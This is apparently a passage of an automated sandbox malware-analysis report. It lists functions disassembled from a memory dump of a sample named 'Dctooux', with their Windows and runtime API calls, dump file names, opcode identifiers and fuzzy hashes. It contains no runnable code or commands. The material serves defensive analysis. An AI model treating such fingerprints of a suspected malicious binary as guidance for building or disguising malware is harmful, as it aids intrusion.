GetSidIdentifierAuthority.ADVAPI32(?), ref: 00A56ADD
GetSidSubAuthorityCount.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00A56BF1
GetSidSubAuthority.ADVAPI32(?,00000000), ref: 00A56C18

Memory Dump Source

Source File: 00000018.00000002.2563891260.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A50000, based on PE: true

Associated: 00000018.00000002.2563859289.0000000000A50000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2563996199.0000000000AA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564038562.0000000000AB5000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564092320.0000000000AB7000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564255703.0000000000AB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564345132.0000000000ABA000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a50000_Dctooux.jbxd

Yara matches

Similarity

API ID: Authority$Name$AccountCountIdentifierLookupUser
String ID:
API String ID: 4230999276-0
Opcode ID: 46b6e8fb1da02021dfb609b4ef45b18b1c2d0b3f363a8f64f94853128afd0f74
Instruction ID: 62c9f809ba696ed318bc378b5755674eb762f83b3e6db711ea90d1f0674f132e
Opcode Fuzzy Hash: 46b6e8fb1da02021dfb609b4ef45b18b1c2d0b3f363a8f64f94853128afd0f74
Instruction Fuzzy Hash: C391C3B1A001189BDB28DB28CD85BDDB779FB45305F8045E9E90997282DB349FC8CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 00A97B89 Relevance: 7.7, APIs: 5, Instructions: 244COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(?,?), ref: 00A97C2C
__alloca_probe_16.LIBCMT ref: 00A97CE2
__alloca_probe_16.LIBCMT ref: 00A97D78
__freea.LIBCMT ref: 00A97DE3
__freea.LIBCMT ref: 00A97DEF

Memory Dump Source

Source File: 00000018.00000002.2563891260.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A50000, based on PE: true

Associated: 00000018.00000002.2563859289.0000000000A50000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2563996199.0000000000AA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564038562.0000000000AB5000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564092320.0000000000AB7000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564255703.0000000000AB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564345132.0000000000ABA000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a50000_Dctooux.jbxd

Yara matches

Similarity

API ID: __alloca_probe_16__freea$Info
String ID:
API String ID: 2330168043-0
Opcode ID: 5e44e905abce3e9f737172ae2abbe927a6746c7dd6f9e702204208a6be678207
Instruction ID: aa7507fe9ba30029cf3c0f83920e0eef38b2ee877c2ae3513d75d7b30887cc7a
Opcode Fuzzy Hash: 5e44e905abce3e9f737172ae2abbe927a6746c7dd6f9e702204208a6be678207
Instruction Fuzzy Hash: 88819072F2821AABDF219F648D81EFE7BF9AF49710F180055E905A7251E635DC40CBB0

Uniqueness

Uniqueness Score: -1.00%

Function 00A88321 Relevance: 7.6, APIs: 5, Instructions: 141pipeCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetFileType.KERNEL32(?,?,00000000,00000000), ref: 00A88343
GetFileInformationByHandle.KERNEL32(?,?), ref: 00A8839D
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00A88253,?,000000FF), ref: 00A8842B
__dosmaperr.LIBCMT ref: 00A88432
PeekNamedPipe.KERNEL32(?,00000000,00000000,00000000,?,00000000), ref: 00A8846F

Part of subcall function 00A88697: __dosmaperr.LIBCMT ref: 00A886CC

Memory Dump Source

Source File: 00000018.00000002.2563891260.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A50000, based on PE: true

Associated: 00000018.00000002.2563859289.0000000000A50000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2563996199.0000000000AA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564038562.0000000000AB5000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564092320.0000000000AB7000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564255703.0000000000AB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564345132.0000000000ABA000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a50000_Dctooux.jbxd

Yara matches

Similarity

API ID: File__dosmaperr$ErrorHandleInformationLastNamedPeekPipeType
String ID:
API String ID: 1206951868-0
Opcode ID: 55b32cc1b9bd05fb329fb5e2ceb4e7b6939a4d83eea010e66c97e1bc0c54511b
Instruction ID: a82f7540fdeec0a53843f2a8b7ebad844d3b1fe7c97f0aa4d288268ba51f5c13
Opcode Fuzzy Hash: 55b32cc1b9bd05fb329fb5e2ceb4e7b6939a4d83eea010e66c97e1bc0c54511b
Instruction Fuzzy Hash: 39415B76900609AFCB24EFB5DD459ABBBF9EF88300B50452DF956D3660EF389805CB20

Uniqueness

Uniqueness Score: -1.00%

Function 00A70136 Relevance: 7.6, APIs: 5, Instructions: 101COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3_GS.LIBCMT ref: 00A7013D
Concurrency::details::_NonReentrantPPLLock::_Scoped_lock::_Scoped_lock.LIBCONCRT ref: 00A70167

Part of subcall function 00A7082D: Concurrency::critical_section::_Acquire_lock.LIBCONCRT ref: 00A7084A

__alloca_probe_16.LIBCMT ref: 00A701A3
Concurrency::details::EventWaitNode::Satisfy.LIBCONCRT ref: 00A701E4
Concurrency::details::_ReaderWriterLock::_Scoped_lock::~_Scoped_lock.LIBCONCRT ref: 00A70216

Memory Dump Source

Source File: 00000018.00000002.2563891260.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A50000, based on PE: true

Associated: 00000018.00000002.2563859289.0000000000A50000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2563996199.0000000000AA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564038562.0000000000AB5000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564092320.0000000000AB7000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564255703.0000000000AB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564345132.0000000000ABA000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a50000_Dctooux.jbxd

Yara matches

Similarity

API ID: Concurrency::details::_Lock::_Scoped_lock$Acquire_lockConcurrency::critical_section::_Concurrency::details::EventH_prolog3_Node::ReaderReentrantSatisfyScoped_lock::_Scoped_lock::~_WaitWriter__alloca_probe_16
String ID:
API String ID: 2568206803-0
Opcode ID: 0963a43d3e2df8eb0944066246ee2c92c0538ce2f99ef68c19d70a0a445f1457
Instruction ID: 2ee54cc82609916920f3e3c9eba1d1275fdf43ad88ee0ff25a2103328a39abbc
Opcode Fuzzy Hash: 0963a43d3e2df8eb0944066246ee2c92c0538ce2f99ef68c19d70a0a445f1457
Instruction Fuzzy Hash: B9319E72A00216CBCB14DFA8CD41AAEBBF5AF19310F65C169E509E7341DB349E42CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00A79B19 Relevance: 7.6, APIs: 5, Instructions: 88COMMON

Download Yara Rule

APIs

_SpinWait.LIBCONCRT ref: 00A79B3E

Part of subcall function 00A6FF20: _SpinWait.LIBCONCRT ref: 00A6FF38

Concurrency::details::ContextBase::ClearAliasTable.LIBCONCRT ref: 00A79B52
Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 00A79B84
List.LIBCMT ref: 00A79C07
List.LIBCMT ref: 00A79C16

Memory Dump Source

Source File: 00000018.00000002.2563891260.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A50000, based on PE: true

Associated: 00000018.00000002.2563859289.0000000000A50000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2563996199.0000000000AA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564038562.0000000000AB5000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564092320.0000000000AB7000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564255703.0000000000AB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564345132.0000000000ABA000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a50000_Dctooux.jbxd

Yara matches

Similarity

API ID: ListSpinWait$AcquireAliasBase::ClearConcurrency::details::Concurrency::details::_ContextLock::_ReaderTableWriteWriter
String ID:
API String ID: 3281396844-0
Opcode ID: e5fb11010c4129a3f62afd58f963d1c3925b98053832446ea1348d3a6d28f2a8
Instruction ID: b5e01fe82297e5dc35bd6a091cefef468bb5e75df381aed9bf15ef02d49fdb6f
Opcode Fuzzy Hash: e5fb11010c4129a3f62afd58f963d1c3925b98053832446ea1348d3a6d28f2a8
Instruction Fuzzy Hash: 72317A32D01619DFCB14EFA4EA915EEB7B1BF94318F04C16BD8092B282DB316E04CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00A9041A Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00A90432

Part of subcall function 00A8C1D5: HeapFree.KERNEL32(00000000,00000000,?,00A904AD,?,00000000,?,?,?,00A904D4,?,00000007,?,?,00A908D6,?), ref: 00A8C1EB
Part of subcall function 00A8C1D5: GetLastError.KERNEL32(?,?,00A904AD,?,00000000,?,?,?,00A904D4,?,00000007,?,?,00A908D6,?,?), ref: 00A8C1FD

_free.LIBCMT ref: 00A90444
_free.LIBCMT ref: 00A90456
_free.LIBCMT ref: 00A90468
_free.LIBCMT ref: 00A9047A

Memory Dump Source

Source File: 00000018.00000002.2563891260.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A50000, based on PE: true

Associated: 00000018.00000002.2563859289.0000000000A50000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2563996199.0000000000AA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564038562.0000000000AB5000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564092320.0000000000AB7000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564255703.0000000000AB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564345132.0000000000ABA000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a50000_Dctooux.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 6373c89215c32910aefc3796b645dea9f0518294cd9dc7e50d3edc69c4160c74
Instruction ID: 7a8196717df8a7145e0218b873d3abef3a98c7a91a1774ccb40a097e785bb689
Opcode Fuzzy Hash: 6373c89215c32910aefc3796b645dea9f0518294cd9dc7e50d3edc69c4160c74
Instruction Fuzzy Hash: 5FF0FF72B45600AFCA60FBA8EAC5E1A77E9EA807707644D05F649D7912CA30FC818A74

Uniqueness

Uniqueness Score: -1.00%

Function 00A86AAB Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 00A86AD0
CatchIt.LIBVCRUNTIME ref: 00A86BB6

Strings

RCC, xrefs: 00A86AEA
MOC, xrefs: 00A86AE2

Memory Dump Source

Source File: 00000018.00000002.2563891260.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A50000, based on PE: true

Associated: 00000018.00000002.2563859289.0000000000A50000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2563996199.0000000000AA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564038562.0000000000AB5000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564092320.0000000000AB7000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564255703.0000000000AB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564345132.0000000000ABA000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a50000_Dctooux.jbxd

Yara matches

Similarity

API ID: CatchEncodePointer
String ID: MOC$RCC
API String ID: 1435073870-2084237596
Opcode ID: f31e94111b3fb06b1544f5e719de2f23188978f55f59d91da8093be449d744ad
Instruction ID: 5bc861c9d3a2a7bb007c7ac12573ab12f7b4272d31c953c5ec8d6e164f79e290
Opcode Fuzzy Hash: f31e94111b3fb06b1544f5e719de2f23188978f55f59d91da8093be449d744ad
Instruction Fuzzy Hash: 97418D72900209AFEF16EF94CD85EEEBBB5FF48308F148169F904AB261D7359950DB50

Uniqueness

Uniqueness Score: -1.00%

Function 00A7C2B5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 80COMMON

Download Yara Rule

APIs

List.LIBCONCRT ref: 00A7C33A
std::invalid_argument::invalid_argument.LIBCONCRT ref: 00A7C35F
Concurrency::details::FreeVirtualProcessorRoot::FreeVirtualProcessorRoot.LIBCONCRT ref: 00A7C39E

Strings

pExecutionResource, xrefs: 00A7C357

Memory Dump Source

Source File: 00000018.00000002.2563891260.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A50000, based on PE: true

Associated: 00000018.00000002.2563859289.0000000000A50000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2563996199.0000000000AA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564038562.0000000000AB5000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564092320.0000000000AB7000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564255703.0000000000AB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564345132.0000000000ABA000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a50000_Dctooux.jbxd

Yara matches

Similarity

API ID: FreeProcessorVirtual$Concurrency::details::ListRootRoot::std::invalid_argument::invalid_argument
String ID: pExecutionResource
API String ID: 1772865662-359481074
Opcode ID: 741fa3ec321cbb652a45fb36de10357f286a03ac80fe9677406a10ebc96a93e9
Instruction ID: 9b5334d7772bcb02774ad2609e8cc92fdbe2cbef36c389808eecf53197097a42
Opcode Fuzzy Hash: 741fa3ec321cbb652a45fb36de10357f286a03ac80fe9677406a10ebc96a93e9
Instruction Fuzzy Hash: A2219375700205ABCF09EFA4CE42BEDB7B5BF58700F148029F5056B282DBB4EE018BA5

Uniqueness

Uniqueness Score: -1.00%

Function 00A7B53E Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35threadCOMMON

Download Yara Rule

APIs

Concurrency::details::SchedulerProxy::GetCurrentThreadExecutionResource.LIBCMT ref: 00A7B552
Concurrency::details::ResourceManager::RemoveExecutionResource.LIBCONCRT ref: 00A7B576
std::invalid_argument::invalid_argument.LIBCONCRT ref: 00A7B589

Strings

pScheduler, xrefs: 00A7B581

Memory Dump Source

Source File: 00000018.00000002.2563891260.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A50000, based on PE: true

Associated: 00000018.00000002.2563859289.0000000000A50000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2563996199.0000000000AA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564038562.0000000000AB5000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564092320.0000000000AB7000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564255703.0000000000AB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564345132.0000000000ABA000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a50000_Dctooux.jbxd

Yara matches

Similarity

API ID: Resource$Concurrency::details::Execution$CurrentManager::Proxy::RemoveSchedulerThreadstd::invalid_argument::invalid_argument
String ID: pScheduler
API String ID: 246774199-923244539
Opcode ID: a25f4e5e5a4d833996b0378224065b928f3ffab4fe8b0d3e031909abe565a4be
Instruction ID: 9cbc18ca84e4b921f601b0094d1cdc2f02bf09c653ca5a74675df5c463e70fe8
Opcode Fuzzy Hash: a25f4e5e5a4d833996b0378224065b928f3ffab4fe8b0d3e031909abe565a4be
Instruction Fuzzy Hash: E6F0B476A00604A7C724EB54DD52D9DB379AE94B21710C56AF41F13582DB70ED05C6A1

Uniqueness

Uniqueness Score: -1.00%

Function 00A58180 Relevance: 6.4, APIs: 4, Instructions: 388libraryloaderCOMMON

Download Yara Rule

APIs

GetVersionExW.KERNEL32(0000011C,F037EC41), ref: 00A581FA
GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00A5825B
GetProcAddress.KERNEL32(00000000), ref: 00A58262
GetSystemInfo.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00A58327

Memory Dump Source

Source File: 00000018.00000002.2563891260.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A50000, based on PE: true

Associated: 00000018.00000002.2563859289.0000000000A50000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2563996199.0000000000AA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564038562.0000000000AB5000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564092320.0000000000AB7000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564255703.0000000000AB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564345132.0000000000ABA000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a50000_Dctooux.jbxd

Yara matches

Similarity

API ID: AddressHandleInfoModuleProcSystemVersion
String ID:
API String ID: 1456109104-0
Opcode ID: 07bfc4c8176892951cea3d36e3c67b307e49a259fdb5ae95c415443a2af96669
Instruction ID: c8ac9178dbbf2996990482fa39320a2d04567dadd1e78d92dc63ebd7a353d3ca
Opcode Fuzzy Hash: 07bfc4c8176892951cea3d36e3c67b307e49a259fdb5ae95c415443a2af96669
Instruction Fuzzy Hash: 4CD1D270E00644ABDB15EB78CE4739D7B71BB46725F944288EC156B2C3DF394A898BC2

Uniqueness

Uniqueness Score: -1.00%

Function 00A8649E Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 00A86565
___AdjustPointer.LIBCMT ref: 00A86588
___AdjustPointer.LIBCMT ref: 00A86624

Memory Dump Source

Source File: 00000018.00000002.2563891260.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A50000, based on PE: true

Associated: 00000018.00000002.2563859289.0000000000A50000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2563996199.0000000000AA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564038562.0000000000AB5000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564092320.0000000000AB7000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564255703.0000000000AB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564345132.0000000000ABA000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a50000_Dctooux.jbxd

Yara matches

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: 70db76862aa7c4a981b2ca3b1ca2e1f240e49ccedd78ea962340c6cacbd6def7
Instruction ID: 3c99815202302e9621ad92a7bdd3842d2cf838d33ee2d627abc8462379fbcf30
Opcode Fuzzy Hash: 70db76862aa7c4a981b2ca3b1ca2e1f240e49ccedd78ea962340c6cacbd6def7
Instruction Fuzzy Hash: 9451D072A00202AFFB2DAF14DA41BBAB7B4FF14320F14452DE90597699EB31EC51CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00A58720 Relevance: 6.2, APIs: 4, Instructions: 155libraryloaderCOMMON

Download Yara Rule

APIs

GetVersionExW.KERNEL32(0000011C,?,F037EC41), ref: 00A58799
GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00A58800
GetProcAddress.KERNEL32(00000000), ref: 00A58807

Memory Dump Source

Source File: 00000018.00000002.2563891260.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A50000, based on PE: true

Associated: 00000018.00000002.2563859289.0000000000A50000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2563996199.0000000000AA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564038562.0000000000AB5000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564092320.0000000000AB7000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564255703.0000000000AB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564345132.0000000000ABA000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a50000_Dctooux.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProcVersion
String ID:
API String ID: 3310240892-0
Opcode ID: 942e096a1f8a2e422a70ca6ea7f183c8eba70abf7cd2cc04238e9b1d2fc11584
Instruction ID: ede919b8a487809485910535be876a8bd13416045f4c736fe27efa96790d7663
Opcode Fuzzy Hash: 942e096a1f8a2e422a70ca6ea7f183c8eba70abf7cd2cc04238e9b1d2fc11584
Instruction Fuzzy Hash: CF51F671D002089BEB14EB78CD497DDBB75FB45315F904298EC05A72D1EF389A88CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00A86065 Relevance: 6.1, APIs: 4, Instructions: 141COMMON

Download Yara Rule

APIs

TypeidsEqual.LIBVCRUNTIME ref: 00A860B6
TypeidsEqual.LIBVCRUNTIME ref: 00A860DB
PMDtoOffset.LIBCMT ref: 00A860F1
PMDtoOffset.LIBCMT ref: 00A86172

Memory Dump Source

Source File: 00000018.00000002.2563891260.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A50000, based on PE: true

Associated: 00000018.00000002.2563859289.0000000000A50000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2563996199.0000000000AA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564038562.0000000000AB5000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564092320.0000000000AB7000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564255703.0000000000AB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564345132.0000000000ABA000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a50000_Dctooux.jbxd

Yara matches

Similarity

API ID: EqualOffsetTypeids
String ID:
API String ID: 1707706676-0
Opcode ID: f8ad74cfaf4da85e0defff2bffeebfbe5beaccf25cb2e0bdfe85511ce37fdb4b
Instruction ID: ca2bbd809dc78b43d2c77f830f75221351ebafe2b50fcae10ef2a8d6391edd23
Opcode Fuzzy Hash: f8ad74cfaf4da85e0defff2bffeebfbe5beaccf25cb2e0bdfe85511ce37fdb4b
Instruction Fuzzy Hash: B951BE35D042099FEF11EF68C985AAEFBF5EF15354F14464AD840A7253D732A948CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00A973AE Relevance: 6.1, APIs: 4, Instructions: 132fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00A9747E
_free.LIBCMT ref: 00A974A7
SetEndOfFile.KERNEL32(00000000,00A92DEA,00000000,00A93081,?,?,?,?,?,?,?,00A92DEA,00A93081,00000000), ref: 00A974D9
GetLastError.KERNEL32(?,?,?,?,?,?,?,00A92DEA,00A93081,00000000,?,?,?,?,00000000), ref: 00A974F5

Memory Dump Source

Source File: 00000018.00000002.2563891260.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A50000, based on PE: true

Associated: 00000018.00000002.2563859289.0000000000A50000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2563996199.0000000000AA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564038562.0000000000AB5000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564092320.0000000000AB7000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564255703.0000000000AB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564345132.0000000000ABA000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a50000_Dctooux.jbxd

Yara matches

Similarity

API ID: _free$ErrorFileLast
String ID:
API String ID: 1547350101-0
Opcode ID: ee8ab5c272d78fee930eba3f8b67856e9cfe49aa89f1534b35c61fc74e7338c5
Instruction ID: fbd077c3b5c0f7d6f81fc97f482f6baae5fa81d8e9e4341b1872ced151a870cc
Opcode Fuzzy Hash: ee8ab5c272d78fee930eba3f8b67856e9cfe49aa89f1534b35c61fc74e7338c5
Instruction Fuzzy Hash: FC41A372B186059BDF11ABB8CD46BAE7BF5AF84320F140550F928EB193DA34CC509772

Uniqueness

Uniqueness Score: -1.00%

Function 00A7414C Relevance: 6.1, APIs: 4, Instructions: 101COMMONLIBRARYCODE

Download Yara Rule

APIs

Concurrency::details::ResourceManager::InitializeRMBuffers.LIBCMT ref: 00A7415F

Memory Dump Source

Source File: 00000018.00000002.2563891260.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A50000, based on PE: true

Associated: 00000018.00000002.2563859289.0000000000A50000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2563996199.0000000000AA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564038562.0000000000AB5000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564092320.0000000000AB7000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564255703.0000000000AB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564345132.0000000000ABA000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_a50000_Dctooux.jbxd

Yara matches

Similarity

API ID: BuffersConcurrency::details::InitializeManager::Resource
String ID:
API String ID: 3433162309-0
Opcode ID: 8b41fb536ab819a2653e1cd13d36b63a8e61366296ba7bb7d2988c47ce2a5f35
Instruction ID: 73d39358e547df87449c988761ec8f5e989e9e48357050facf0df73d70de7714
Opcode Fuzzy Hash: 8b41fb536ab819a2653e1cd13d36b63a8e61366296ba7bb7d2988c47ce2a5f35
Instruction Fuzzy Hash: B8316D75A00309DFCF10EF94C9C0BAE7BB9BF49314F1480A9ED09AB246D731A955CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00A7B0E5 Relevance: 6.1, APIs: 4, Instructions: 79COMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog3_catch.LIBCMT ref: 00A7B0EC
Concurrency::SchedulerPolicy::_ValidPolicyValue.LIBCONCRT ref: 00A7B138
std::bad_exception::bad_exception.LIBCMT ref: 00A7B14E
std::bad_exception::bad_exception.LIBCMT ref: 00A7B1BA

Memory Dump Source

Source File: 00000018.00000002.2563891260.0000000000A51000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00A50000, based on PE: true

Associated: 00000018.00000002.2563859289.0000000000A50000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2563996199.0000000000AA2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564038562.0000000000AB5000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564092320.0000000000AB7000.00000008.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564255703.0000000000AB8000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000018.00000002.2564345132.0000000000ABA000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

